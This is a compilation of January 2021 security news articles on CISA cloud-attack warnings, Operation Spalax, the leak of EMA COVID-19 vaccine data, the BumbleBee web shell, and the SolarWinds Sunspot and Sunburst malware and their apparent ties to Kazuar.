On the phishing front, targets are being sent emails containing malicious links, which purport to take users to a “secure message.” Other emails masquerade as alerts for legitimate file hosting services. In both cases, the links take targets to a phishing page, where they’re asked to provide account credentials. The cybercriminals thus harvest these and use them to log into cloud services.
“CISA observed the actors’ logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location),” according to the alert. “The actors then sent emails from the user’s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization’s file-hosting service.”
Meanwhile, attackers have been able to bypass MFA using a “pass-the-cookie” attack. Browser cookies are used to store user authentication information so a website can keep a user signed in. The authentication information is stored in a cookie after the MFA test is satisfied, so the user isn’t prompted for an MFA check again.
Thus, if attackers extract the right browser cookies they can authenticate as a targeted user in a separate browser session, bypassing all MFA checkpoints. As explained in a recent posting from Stealthbits, an attacker would need to convince a user to click on a phishing email or otherwise compromise a user’s system, after which it’s possible to execute code on the machine. A simple command would allow an attacker to extract the appropriate cookie.
“It is important to note that not understanding the weaknesses and potential hacking bypasses of MFA is almost as bad as not using it,” said Roger Grimes, data-driven defense evangelist at KnowBe4, via email. “If you think you’re far less likely to be hacked because of MFA (and that isn’t true), then you are more likely to let your defenses down. But if you understand how MFA can be attacked, and share that with the end users of the MFA and designers of the systems that it relies on, you’re more likely to get a better, less risky outcome. The key is to realize that everything can be hacked. MFA doesn’t impart some special, magical defense that no hacker can penetrate. Instead, strong security awareness training around any MFA solution is crucial, because to do otherwise is to be unprepared and more at risk.”
Exploiting Forwarding Rules
CISA said that it has also observed threat actors, post-initial compromise, collecting sensitive information by taking advantage of email forwarding rules.
Forwarding rules allow users to send work emails to their personal email accounts – a useful feature for remote workers.
CISA said that it has observed threat actors modifying an existing email rule on a user’s account to redirect the emails to attacker-controlled accounts.
“Threat actors also modified existing rules to search users’ email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors’ account,” according to the agency. “The threat actors [also] created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ RSS Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.”
Cloud Security
Cloud adoption, spurred by pandemic work realities, will only accelerate in the year ahead with software-as-a-service, cloud-hosted processes and storage driving the charge. A study by Rebyc found that 35 percent of companies surveyed said they plan to accelerate workload migration to the cloud in 2021.
Budget allocations to cloud security will double as companies look to protect cloud buildouts in the year ahead, according to Gartner.
“[Companies] by shifting the responsibility and work of running hardware and software infrastructure to cloud providers, leveraging the economics of cloud elasticity, benefiting from the pace of innovation in sync with public cloud providers, and more,” said David Smith, distinguished VP Analyst at Gartner.
Accordingly, cloud applications and environments are increasingly in the sights of attackers. In December for instance, the National Security Agency issued a warning that threat actors have developed techniques to leverage vulnerabilities in on-premises network access to compromise the cloud.
“Malicious cyber-actors are abusing trust in federated authentication environments to access protected data,” the advisory read. “The exploitation occurs after the actors have gained initial access to a victim’s on-premises network. The actors leverage privileged access in the on-premises environment to subvert the mechanisms that the organization uses to grant access to cloud and on-premises resources and/or to compromise administrator credentials with the ability to manage cloud resources.”
CISA warns of recent successful cyberattacks against cloud service accounts
15.1.2021 BigBrothers Securityaffairs
The US CISA revealed that several recent successful cyberattacks against various organizations’ cloud services.
The Cybersecurity and Infrastructure Security Agency (CISA) announced that several recent successful cyberattacks hit various organizations’ cloud services.
According to the agency, the attackers conducted phishing campaigns and exploited poor cyber hygiene practices of the victims in the management of cloud services configuration.
CISA has published a report that includes information collected exclusively from several CISA incident response engagements, these data are extremely precious because detail the tactics, techniques, and procedures used by threat actors and indicators of compromise (IOCs). Data in the Analysis Report is not explicitly tied to the supply chain attack on SolarWinds Orion Platform software.
“The cyber threat actors involved in these attacks used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a “pass-the-cookie” attack—to attempt to exploit weaknesses in the victim organizations’ cloud security practices.” reads the report published by CISA.
The US revealed that threat actors bypassed multi-factor authentication (MFA) authentication protocols to compromise cloud service accounts.
Attackers may have used browser cookies to defeat MFA with a “pass-the-cookie” attack ([T1550.004]).
Government experts confirmed that the threat actors initially attempted brute force logins on some accounts without success.
At least in one case, the attackers modified or set up email forwarding rules to redirect the emails to an account under their control.
Threat actors also modified existing rules to search users’ email messages (subject and body) for keywords that could allow them to identify messages containing sensitive data (i.e. Financial information) and forward them to their accounts.
“In addition to modifying existing user email rules, the threat actors created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ Really Simple Syndication (RSS) Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users,” continues CISA.
The FBI also warned US organizations about scammers abusing auto-forwarding rules on web-based email clients in Business Email Compromise (BEC) attacks.
Last week, Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack also employed common hacker techniques to compromise the networks of the targeted organizations, including password guessing and password spraying.
CISA also added that inappropriately secured administrative credentials accessible via external remote access services were abused by the attackers.
CISA added that it is investigating incidents in which threat actors abused the Security Assertion Markup Language (SAML) tokens.
CISA Warns Organizations About Attacks on Cloud Services
15.1.2021 BigBrothers Securityweek
In light of successful cyberattacks targeting organizations’ cloud services, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a series of recommendations on how businesses can improve their cloud security.
The attacks observed by CISA exploit poor cyber hygiene practices within cloud services configurations, and the agency says the activity is not tied to a specific threat actor or the recent SolarWinds attack. Thus, the recommended mitigations apply to all organizations looking to ensure their cloud services are better protected from cyberattacks.
CISA notes that the recommendations are based on CISA incident response engagements and that the observed attacks frequently involved telework that leveraged a mixture of corporate laptops and personal devices for access to cloud services.
“Despite the use of security tools, affected organizations typically had weak cyber hygiene practices that allowed threat actors to conduct successful attacks,” CISA notes.
To exploit weaknesses in the victim organization’s cloud services, the threat actors used techniques such as phishing and brute force attempts. One incident, however, possibly involved a “pass-the-cookie” attack (in which a stolen session cookie is used to access otherwise restricted resources).
Phishing emails were used to trick victims into sharing their login credentials, and then abuse these to access cloud service accounts and phish for additional credentials. Brute force attempts targeted a terminal server at an organization that opened port 80 for remote access rather than using a VPN.
Email forwarding rules were also abused for the collection of sensitive information, as well as modified rules to search for finance-related keywords within the victims’ email messages. In one case, although the compromised account had proper multi-factor authentication (MFA) enabled, the attackers apparently used a “pass-the-cookie” attack for initial access.
“Cookies establish session persistence for web applications. When you are authenticated with a web application, MFA or not, the cookie is placed on your computer. The cookie contains the session ID and access tokens to the web application. This is so you don’t have to reauthenticate incessantly to the web application. This is an inherent flaw in the HTTP protocol and how web applications work. HTTP is a stateless protocol and relies on cookies to maintain state,” Christian Espinosa, Managing Director at Cerberus Sentinel, explains.
“The way to mitigate the MFA pass-the-cookie vulnerability is with better cookie management and better user training. Specially, cookies should be set with a short lifespan. […] The bottom line is there is no single way to fix the pass-the-cookie problem, unless you force a user to reauthenticate more frequently for different web application functionality. This diminishes the user experience though,” Espinosa continues.
To mitigate cyberattacks targeting their cloud services, organizations are advised to implement conditional access (CA) policies, establish a baseline for normal network activity, review logs, enforce MFA, review user-created email forwarding rules and alerts, establish a mitigation plan, secure privileged access, prohibit personal devices at work (unless necessary), audit email rules, ensure users consent only to app integrations that have been pre-approved, and adopt a zero-trust mindset.
Organizations should also ensure that user access logging is enabled, that legacy authentication protocols are blocked, that Remote Desktop Protocol (RDP) ports are closed on cloud-based virtual machines with public IPs, that employees are trained on how to identify threats and report them, and that detection solutions are up-to-date.
For organizations that use Microsoft 365, only a few (one to three) trusted users should be set as electronic discovery (or eDiscovery) managers, PowerShell remoting to Exchange Online should be disabled for regular M365 users, and only a limited number of unsuccessful login attempts should be allowed, to prevent brute-forcing.
Experts Uncover Malware Attacks Against Colombian Government and Companies
15.1.2021 BigBrothers Thehackernews
Cybersecurity researchers took the wraps off an ongoing surveillance campaign directed against Colombian government institutions and private companies in the energy and metallurgical industries.
In a report published by ESET on Tuesday, the Slovak internet security company said the attacks — dubbed "Operation Spalax" — began in 2020, with the modus operandi sharing some similarities to an APT group targeting the country since at least April 2018, but also different in other ways.
The overlaps come in the form of phishing emails, which have similar topics and pretend to come from some of the same entities that were used in a February 2019 operation disclosed by QiAnXin researchers, and subdomain names used for command-and-control (C2) servers.
However, the two campaigns diverge in the attachments used for phishing emails, the remote access trojans (RATs) deployed, and the C2 infrastructure employed to fetch the malware dropped.
The attack chain begins with the targets receiving phishing emails that lead to the download of malicious files, which are RAR archives hosted on OneDrive or MediaFire containing various droppers responsible for decrypting and running RATs such as Remcos, njRAT, and AsyncRAT on a victimized computer.
The phishing emails cover a wide range of topics, including those about driving infractions, attend court hearings, and take mandatory COVID-19 tests, thus increasing the likelihood that unsuspecting users will open the messages.
In an alternate scenario observed by ESET, the attackers were also found to use heavily obfuscated AutoIt droppers that used shellcode to decrypt the payload and another to inject it into an already running process.
The RATs not only come with capabilities for remote control but also to spy on targets by capturing keystrokes, recording screenshots, stealing clipboard data, exfiltrating sensitive documents, and even downloading and executing other malware.
ESET's analysis also revealed a scalable C2 architecture operated using a Dynamic DNS service that allowed them to dynamically assign a domain name to an IP address from a pool of 70 different domain names and 24 IP addresses in the second half of 2020 alone.
"Targeted malware attacks against Colombian entities have been scaled up since the campaigns that were described last year," the researchers concluded. "The landscape has changed from a campaign that had a handful of C2 servers and domain names to a campaign with very large and fast-changing infrastructure with hundreds of domain names used since 2019."
Hackers Leak Stolen Pfizer-BioNTech COVID-19 Vaccine Data
14.1.2021 BigBrothers Threatpost
On the heels of a cyberattack on the EMA, cybercriminals have now leaked Pfizer and BioNTech COVID-19 vaccine data on the internet.
On the heels of a previously-reported cyberattack on the European Medicines Agency (EMA), cybercriminals have spilled compromised data related to COVID-19 vaccinations onto the internet.
The EMA is an agency of the European Union in charge of the evaluation and supervision of medicinal products in the E.U, similar to the FDA in the U.S. In December, the agency disclosed that threat actors broke into its server and accessed documentation about the vaccine from Pfizer and BioNTech. Specifically accessed were some documents relating to the regulatory submission for the companies’ COVID-19 vaccine candidate, BNT162b2, which was stored on the EMA server, a Pfizer spokesperson confirmed to Threatpost.
Fast forward to this week, when “the ongoing investigation of the cyberattack on EMA revealed that some of the unlawfully accessed documents related to COVID-19 medicines and vaccines belonging to third parties have been leaked on the internet.” According to a Tuesday update from the EMA on its website, “necessary action is being taken by the law-enforcement authorities.”
2020 Reader Survey: Share Your Feedback to Help Us Improve
The EMA has not disclosed detailed specifics of the cyberattack, including the timeframe, the initial point of compromise and what specific data on these regulatory submission documents was accessed. In its Tuesday update, it said it continues to notify “additional entities and individuals whose documents and personal data may have been subject to unauthorized access.”
However, the networks of the EMA remain fully functional and the timelines related to the evaluation and approval of COVID-19 vaccines are not affected, the agency stressed. The BNT162b2 vaccine has been rolled out across the U.K. and is in the process of being approved and rolled out in other countries. Of note, Pfizer and BioNTech submitted vaccine approval requests to European drug regulatory bodies on Dec. 1.
Threatpost has reached out to the EMA, Pfizer and BioNTech for further comment.
“It is important to note that no BioNTech or Pfizer systems have been breached in connection with this incident, and we are unaware of any personal data being accessed,” a Pfizer spokesperson said. “At this time, we await further information about EMA’s investigation and will respond appropriately and in accordance with E.U. law…. Our focus remains steadfast on working in close partnership with governments and regulators around the world to bring our COVID-19 vaccine to people around the globe as safely and as efficiently as possible to help bring an end to this devastating pandemic.”
The cyberattack comes during the mass rollout of various COVID-19 vaccines worldwide. Documents about these vaccines – and the development process behind them – can be used for malicious intent of various stripes, such as espionage or financial cyberattacks.
One other reason for cybercriminals to publish such data on the internet could be to create noise or misinformation, Dirk Schrader, global vice president at New Net Technologies told Threatpost. Or, it could be about gaining glory in the underground.
“EMA, as a European institution, is certainly considered a hard target,” said Schrader. “This might be the simplest reason for the documents being published, as a kind of proof among hacking groups.”
Cybercriminals have been tapping into the vaccine rollout with everything from simple phishing scams all the way up to sophisticated Zebrocy malware campaigns. Earlier in December, it was revealed that the Lazarus Group APT and other sophisticated nation-state actors were actively trying to steal COVID-19 research to speed up their countries’ vaccine-development efforts. That added onto previously reported espionage attacks on vaccine-makers AstraZeneca and Moderna.
Joseph Carson, chief security scientist and advisory CISO at Thycotic, told Threatpost that the incident is a hard reminder that cybercriminals will try to gain unauthorized access and steal sensitive information linked to COVID-19 – especially any details related to vaccines.
“Any company or government working on COVID-19 vaccines or testing must increase the priority of cybersecurity especially privileged access as they will continue to be directly targeted by cyberattacks, while right now vaccines are being distributed there is no time for complacency,” Carson told Threatpost. “The latest updated statement released by the EMA, who is the victim of this recent data breach, indicates that the regulatory submission had been accessed unlawfully and now leaked which is a reminder that privileged access security is and will continue to be a challenge for companies to get in control and it must be a top priority for security.”
Official: Number of Victims of Russian Hack Likely to Grow
14.1.2021 BigBrothers Securityweek
The number of federal agencies and private companies who learn that they have been affected by a massive Russian hack is expected to grow as the investigation into it continues, the U.S. government’s chief counterintelligence official said Tuesday.
The FBI and other agencies last week attributed the intrusions to Russia as part of what officials described as an intelligence-gathering operation rather than an effort to damage or disrupt U.S. government operations. U.S. officials said at the time that fewer than 10 federal agencies were believed to have been compromised “by follow-on activity on their systems.”
William Evanina, the director of the U.S. National Counterintelligence and Security Center, said in a live-stream Washington Post interview that he expected to see a “growth” in the number of victims.
So far, the list of agencies known to have been affected includes the Treasury, Commerce and Justice departments, among others.
“I think this will expand accordingly as we identify” additional victims, Evanina said. “I think the hard part for the investigators is we don’t know what we don’t know, but I think this will continue to grow.”
The hacking campaign was extraordinary in scale, with the intruders having stalked through government agencies, defense contractors and telecommunications companies for months by the time it was discovered. Experts say that gave the foreign agents ample time to collect data that could be highly damaging to U.S. national security, though the scope of the breaches and exactly what information was sought is unknown.
An estimated 18,000 organizations were affected by malicious code that piggybacked on popular network-management software from an Austin, Texas, company called SolarWinds.
On Monday, SolarWinds said its investigation found evidence the campaign began in September 2019, with the hackers injecting test code that month. The hackers’ patience was impressive. The malicious code that allowed backdoors to be surreptitiously opened on SolarWinds customers had been hidden in an upgrade by the end of February that was delivered to clients beginning the next month.
It would not be discovered for another nine months.
Hackers Publish COVID-19 Vaccine Data Stolen From EU Medicines Agency
14.1.2021 BigBrothers Securityweek
Hackers have started leaking documents related to COVID-19 medicine and vaccines that were stolen from the European Medicines Agency (EMA) in early December 2020.
The data breach resulted in “a limited number of documents belonging to third parties” being unlawfully accessed, EMA announced on December 11. An investigation was immediately launched into the incident.
While EMA did not provide information on the affected third-parties, Pfizer and BioNTech at the time published a joint statement to reveal that the incident resulted in hackers accessing “some documents relating to the regulatory submission for Pfizer and BioNTech’s COVID-19 vaccine candidate, BNT162b2.”
At the time, Pfizer and BioNTech also said that no trial participants appeared to have been identified using the accessed data.
One week later, EMA, which contacted law enforcement and contracted a third-party firm to support the investigation into the incident, reiterated that the data breach affected only a limited number of documents.
On Wednesday, the agency revealed that the threat actor behind the data breach has published some of the documents that were stolen during the incident (in which a single IT application containing data related to COVID-19 medicines and vaccines was compromised).
“The ongoing investigation of the cyberattack on EMA revealed that some of the unlawfully accessed documents related to COVID-19 medicines and vaccines belonging to third parties have been leaked on the internet. Necessary action is being taken by the law enforcement authorities,” EMA announced.
The regulator also notes that it continues to notify the entities and individuals who might have had documents or personal data accessed during the data breach.
“The Agency and the European medicines regulatory network remain fully functional and timelines related to the evaluation and approval of COVID-19 medicines and vaccines are not affected,” EMA also said.
While both EMA and the affected organizations refrained from providing specific information on the accessed files, BleepingComputer says Microsoft Word documents, PowerPoint presentations, email screenshots, EMA peer review comments, and PDF documents were stolen.
The hackers started leaking data allegedly stolen from EMA at the end of December.
BumbleBee Opens Exchange Servers in xHunt Spy Campaign
13.1.2021 BigBrothers Threatpost
The BumbleBee web shell allows APT attackers to upload and download files, and move laterally by running commands.
A webshell called BumbleBee has taken flight in an ongoing xHunt espionage campaign that has targeted Microsoft Exchange servers at Kuwaiti organizations.
According to researchers at Palo Alto Networks’ Unit 42, BumbleBee (so named because of its color scheme) was observed being used to upload and download files to and from a compromised Exchange server back in September.
“We found BumbleBee hosted on an internal Internet Information Services (IIS) web server on the same network as the compromised Exchange server, as well as on two internal IIS web servers at two other Kuwaiti organizations,” researchers explained in a Monday blog.
Analysis showed that the attackers used VPN access to directly talk to BumbleBee, frequently switching between different VPN servers that appeared to be from different countries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden and the United Kingdom.
This hodgepodge approach was also borne out in the rotation of different operating systems and browsers, specifically Mozilla Firefox or Google Chrome on Windows 10, Windows 8.1 or Linux systems, the firm found.
“We believe this is an attempt to evade detection and make analysis of the malicious activities more difficult,” Unit 42 researchers noted. “This [also] suggests the actor has access to multiple systems and uses this to make analysis of the activities more difficult, or that there are multiple actors involved, who have differing preferences for operating systems and browsers.”
BumbleBee was also used in lateral-movement efforts, running commands from the attackers to discover additional systems. And indeed, the researchers discovered additional BumbleBee webshells hosted on internal IIS web servers that are not connected to the internet at all three Kuwaiti organizations. The cyberattackers used SSH tunnels to interact with these, created using the PuTTY Link (Plink) tool.
“We observed the actor using Plink to create an SSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote Desktop Protocol (RDP),” researchers wrote. “We also observed the actor creating SSH tunnels to internal servers for TCP port 80, which suggests the actor used the tunnel to access internal IIS web servers. We believe that the actor accessed these additional internal IIS web servers to leverage file uploading functionality in internal web applications to install BumbleBee as a method of lateral movement.”
BumbleBee: Password Pollination
Looking deeper into the web shell, Unit 42 found that BumbleBee requires an attacker to supply one password to view the web shell, and a second password to interact with it.
“The actor must [first] provide a password in a URL parameter named parameter,” according to the firm. “Otherwise, the form used to interact with BumbleBee will not display in the browser. To check the supplied password for authentication, the web shell will generate an MD5 hash of the parameter value and check it with a hardcoded MD5 hash.”
Once the operators are able to access BumbleBee, it provides three main functionalities: Executing commands, and uploading and downloading files from the compromised server.
“To carry out any of these functions, the actor must supply a second password,” researchers wrote. “The BumbleBee web shell will generate an MD5 hash of the password and check it with a hardcoded MD5 hash before carrying out the functionality.”
BumbleBee, the Spy Bee
In looking at the IIS server logs and other logs from the Exchange server, the researchers were able to observe the HTTP POST requests generated when the attackers issued commands via BumbleBee.
After some additional analysis, researchers were able to piece together a fuller picture of what BumbleBee is specifically used for.
“The actor spent three hours and 37 minutes on Sept. 16, 2020, running commands via the BumbleBee web shell installed on the [first] compromised Exchange server,” according to the analysis.
The activities included performing network discovery using ping and net group commands, as well as PowerShell to find additional computers on the network; and, performing account discovery using the whoami and quser commands. The attackers also determined the system time using the W32tm and time commands; and created an SSH tunnel using Plink to a remote host and used RDP over that SSH tunnel to control the compromised computer. They also performed lateral movement to another system by mounting a shared folder; and, finally, they removed evidence of the attack by deleting BumbleBee after they were done issuing commands.
In addition to analyzing commands executed on the compromised Exchange server, Unit 42 also analyzed the commands executed on the BumbleBee web shell at an internal IIS web server hosted at one of the two other Kuwaiti organizations.
“On Sept. 10, 2020, we found that the actor ran several commands to perform network and user account discovery. Additionally, the actor used BumbleBee to upload a second web shell with a filename of cq.aspx. The actor used this second web shell to run a PowerShell script that issued SQL queries to a Microsoft SQL Server database.”
Ongoing Campaign
The the known xHunt threat group, which was first discovered in 2018 and has previously launched an array of attacks targeting the Kuwait government, as well as shipping and transportation organizations, has steadily updated its arsenal of tools, all in the service of spying on their targets.
The most recent campaign stretched back to February, when xHunt compromised an Exchange server via Outlook Web App using compromised credentials.
“The actor used the search functionality within Outlook Web App to search for email addresses, including searching for the domain name of the compromised Kuwaiti organization to get a full list of email addresses, as well as specific keywords, such as helpdesk,” researchers explained. “We also saw the actor viewing emails in the compromised account’s inbox, specifically emails from service providers and technology vendors. Additionally, the actor viewed alert emails from a Symantec product and Fortinet’s FortiWeb product.”
This searching for emails to the helpdesk and viewing security alert emails suggests that xHunt was keeping abreast of whether the Kuwaiti organization had noticed malicious activity.
“The attempts to conceal their location and the focus on viewing emails that might notify administrators of the compromised network of the attacker’s presence may explain how the actor was able to maintain a presence on the compromised network for many months,” the researchers noted.
Connecting the dots between SolarWinds and Russia-linked Turla APT
12.1.2021 BigBrothers Securityaffairs
Experts have found some similarities between the Sunburst backdoor used in the SolarWinds supply chain attack and Turla’s backdoor Kazuar.
Security experts from Kaspersky have identified multiple similarities between the Sunburst malware used in the SolarWinds supply chain attack and the Kazuar backdoor that has been employed in cyber espionage campaigns conducted by Russia-linked APT group Turla.
The discovery comes a few days after the US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.
The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.
While dissecting the Sunburst malware, Kaspersky experts noticed several similarities with the Kazuar, including a number of unusual, shared features.
“While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Kazuar is a .NET backdoor first reported by Palo Alto in 2017. Palo Alto tentatively linked Kazuar to the Turla APT group, although no solid attribution link has been made public. Our own observations indeed confirm that Kazuar was used together with other Turla tools during multiple breaches in past years.” reads the report published by Kaspersky.
“A number of unusual, shared features between Sunburst and Kazuar include the victim UID generation algorithm, the sleeping algorithm and the extensive usage of the FNV-1a hash.”
Palo Alto Networks is the security firm that first collected evidence that could link Kazuar to Turla APT.
Kazuar is a fully featured .NET backdoor that was used by the Russia-linked APT group to replace the group’s second stage backdoors, including Carbon platform.
“We do not know who is behind the SolarWinds hack – we believe attribution is a question better left for law enforcement and judicial institutions. To clarify, our research has identified a number of shared code features between the Sunburst malware and Kazuar.” continues the report.
Kaspersky reported that the Kazuar malware was continuously improved, the newest sample was detected by Kaspersky in on December 29, 2020.
Experts noticed multiple similarities between the code fragments from Sunburst and Kazuar variants, while the UID calculation subroutine and the FNV-1a hashing algorithm usage, and the sleep loop are not identical.
Kaspersky made some assumptions on the causes of these similarities, one of them is that Sunburst and Kazuar may have been developed by the same threat actors. Another assumption is that the development team behind Sunburst borrowed part of codes from Kazuar without, but this doesn’t imply that the two attackers are connected.
Below the full list of assumptions made by Kaspersky:
Sunburst was developed by the same group as Kazuar
The Sunburst developers used some ideas or code from Kazuar, without having a direct connection (they used Kazuar code as “inspiration”)
Both groups, that is, the DarkHalo/UNC2452 and the group using Kazuar obtained their malware from the same source
One of the Kazuar developers moved to another team, taking his knowledge and tools with them
The Sunburst developers introduced these subtle links as a form of a false flag, in order to shift the blame to another group
At the time of this report is, it is not possible which of the above assuptions is correc.
NSA Publishes Cybersecurity Year in Review Report
12.1.2021 BigBrothers Securityweek
The United States National Security Agency (NSA) has released its 2020 Cybersecurity Year in Review report, which summarizes the NSA Cybersecurity Directorate's first full year of operation.
The Cybersecurity Directorate was formally announced in July 2019, with a focus on protecting national security networks and the defense industrial base. Led by Ms. Anne Neuberger, Director of Cybersecurity, the Directorate was also aiming to improve cybersecurity efforts through partnerships.
NSA Year in Review: 2020The Cybersecurity Directorate remained true to its goal throughout 2020, the report claims, working to prevent and eradicate cyber threats through combining threat intelligence and cryptography knowledge with vulnerability analysis and defense operations.
“Drawing on lessons learned from the 2016 presidential election and the 2018 mid-term elections, NSA was fully engaged in whole-of-government efforts to protect the 2020 election from foreign interference and influence. Cybersecurity was a foundational component of NSA’s overall election defense effort,” the report (PDF) reads.
Last year, the NSA helped the Department of Defense (DoD) eliminate weak cryptography and approved quantum-resistant cryptographic algorithms, to ensure that the Department’s cryptography is modern enough to resist quantum computing attacks.
In the context of the COVID-19 pandemic, the NSA helped the DoD’s transition to telework, providing solutions for approximately 100,000 users to work remotely securely. Furthermore, the Agency was involved in Operation Warp Speed (OWS), an effort aimed at accelerating the development of a COVID-19 vaccine.
Since the Directorate’s creation, the NSA has provided 30 unique, timely and actionable cybersecurity products to alert the National Security System (NSS), DoD, and Defense Industrial Base (DIB) network owners of cyber-threats.
Some of the intelligence shared by the Agency in 2020 includes details on Windows 10 flaws and on Drovorub malware, IOCs associated with the targeting of Exim mail servers by the Russia-linked Sandworm Team, details on bugs threat actors abuse to install web shell malware on web servers, and a list of 25 vulnerabilities commonly targeted by Chinese threat actors.
Although the Cybersecurity Advisories (CSAs) were mainly destined for NSS, DoD, and DIB owners, the private sector in the United States and abroad could also leverage the intelligence to strengthen security posture, the NSA says.
Furthermore, the NSA released guidance on properly configuring IPsec VPNs (IP Security Virtual Private Networks), on how to customize the Unified Extensible Firmware Interface (UEFI) Secure Boot, and how to security networks and employees during telework.
Last year, NSA’s Cybersecurity Collaboration Center worked on advancing public-private collaboration and on refocusing Enduring Security Framework (ESF) efforts toward the security of 5G deployments. The Agency also launched the Center for Cybersecurity Standards (CCSS), meant to engage with standards bodies.
“NSA also continues to discover and release cybersecurity vulnerabilities to private industry through an approved, intra-government process. For the past three years, vulnerability disclosures by NSA have trended upward, as the Agency commits to enabling the security of commercial technologies that the U.S. Government, our military, our businesses, and our citizens rely upon,” the Agency notes.
Unveiled: SUNSPOT Malware Was Used to Inject SolarWinds Backdoor
12.1.2021 BigBrothers Threatpost
As the investigation into the SolarWinds supply-chain attack continues, cybersecurity researchers have disclosed a third malware strain that was deployed into the build environment to inject the backdoor into the company's Orion network monitoring platform.
Called "Sunspot," the malignant tool adds to a growing list of previously disclosed malicious software such as Sunburst and Teardrop.
"This highly sophisticated and novel code was designed to inject the Sunburst malicious code into the SolarWinds Orion Platform without arousing the suspicion of our software development and build teams," SolarWinds' new CEO Sudhakar Ramakrishna explained.
While preliminary evidence found that operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, the latest findings reveal a new timeline that establishes the first breach of SolarWinds network on September 4, 2019 — all carried out with an intent to deploy Sunspot.
"Sunspot monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the Sunburst backdoor code," Crowdstrike researchers said in a Monday analysis.
Crowdstrike is tracking the intrusion under the moniker "StellarParticle."
Once installed, the malware ("taskhostsvc.exe") grants itself debugging privileges and sets about its task of hijacking the Orion build workflow by monitoring running software processes on the server, and subsequently replace a source code file in the build directory with a malicious variant to inject Sunburst while Orion is being built.
The subsequent October 2019 version of the Orion Platform release appears to have contained modifications designed to test the perpetrators' ability to insert code into our builds," Ramakrishna said, echoing previous reports from ReversingLabs.
The development comes as Kaspersky researchers found what appears to be a first potential connection between Sunburst and Kazuar, a malware family linked to Russia's Turla state-sponsored cyber-espionage outfit.
The cybersecurity firm, however, refrained from drawing too many inferences from the similarities, instead suggesting that the overlaps may have been intentionally added to mislead attribution.
While the similarities are far from a smoking gun tying the hack to Russia, U.S. government officials last week formally pinned the Solorigate operation on an adversary "likely Russian in origin."
Researchers Find Links Between Sunburst and Russian Kazuar Malware
12.1.2021 BigBrothers Threatpost
Cybersecurity researchers, for the first time, may have found a potential connection between the backdoor used in the SolarWinds hack to a previously known malware strain.
In new research published by Kaspersky researchers today, the cybersecurity firm said it discovered several features that overlap with another backdoor known as Kazuar, a .NET-based malware first documented by Palo Alto Networks in 2017.
Disclosed early last month, the espionage campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to infiltrate government agencies and other companies so as to deploy a custom malware codenamed "Sunburst."
Shared Features Between Sunburst and Kazuar
Attribution for the SolarWinds supply-chain compromise has been difficult in part due to little-to-no clues linking the attack infrastructure to previous campaigns or other well-known threat groups.
But Kaspersky's latest analysis of the Sunburst backdoor has revealed a number of shared features between the malware and Kazuar, leading the researchers to suspect that —
Both Sunburst and Kazuar were developed by the same threat group
The adversary behind Sunburst used Kazuar as an inspiration
The groups behind Kazuar (Turla) and Sunburst (UNC2452 or Dark Halo) obtained the malware from a single source
The developers of Kazuar moved to another team, taking their toolset with them, or
The Sunburst developers deliberately introduced these links as "false flag" to shift blame to another group
The commonalities shared between the two malware families include the use of a sleeping algorithm to stay dormant for a random period between connections to a C2 server, the extensive usage of the FNV-1a hash to obfuscate the malicious code, and the use of a hashing algorithm to generate unique victim identifiers.
While Kazuar randomly selects a sleeping period between two and four weeks between C2 connections, Sunburst randomly opts for a sleeping period between 12 and 14 days before contacting the server for initial reconnaissance. But researchers noted that the formula used to calculate the sleeping time remains the same.
Kazuar's Possible Links to Turla
Kazuar is a fully featured backdoor written using the .NET Framework and relies on a command-and-control (C2) channel to allow actors to interact with the compromised system and exfiltrate data. Its features run the typical spyware gamut, with support for running malicious commands, capture screenshots, and even deploy additional functionalities via a plugin command.
Palo Alto Networks' Unit 42 team tentatively linked the tool to the Russian threat group Turla (aka Uroburos and Snake) based on the fact that the "code lineage in Kazuar can be traced back to at least 2005."
What's more, on November 18, 2020, Kazuar appears to have undergone a complete redesign with new keylogger and password-stealing functions added to the backdoor that's implemented in the form of a C2 server command.
While it's normal for threat actors to keep updating their toolset and introduce features designed to bypass endpoint detection and response (EDR) systems, Kaspersky researchers raised the possibility that the changes may have been introduced in response to the SolarWinds breach.
"Suspecting the SolarWinds attack might be discovered, the Kazuar code was changed to resemble the Sunburst backdoor as little as possible," the researchers said.
CISA Updates SolarWinds Advisory
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Federal Bureau of Investigation (FBI), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA), issued a joint statement formally accusing an adversary "likely Russian in origin" for staging the SolarWinds hack.
Furthermore, CISA, in an update to its advisory on January 6, said, "incident response investigations have identified that initial access in some cases was obtained by password guessing, password spraying, and inappropriately secured administrative credentials accessible via external remote access services."
"These code overlaps between Kazuar and Sunburst are interesting and represent the first potential identified link to a previously known malware family," Kaspersky researchers concluded.
"While Kazuar and Sunburst may be related, the nature of this relation is still not clear. Through further analysis, it is possible that evidence confirming one or several of these points might arise. At the same time, it is also possible that the Sunburst developers were really good at their opsec and didn't make any mistakes, with this link being an elaborate false flag."
SolarWinds hackers also used common hacker techniques, CISA revealed
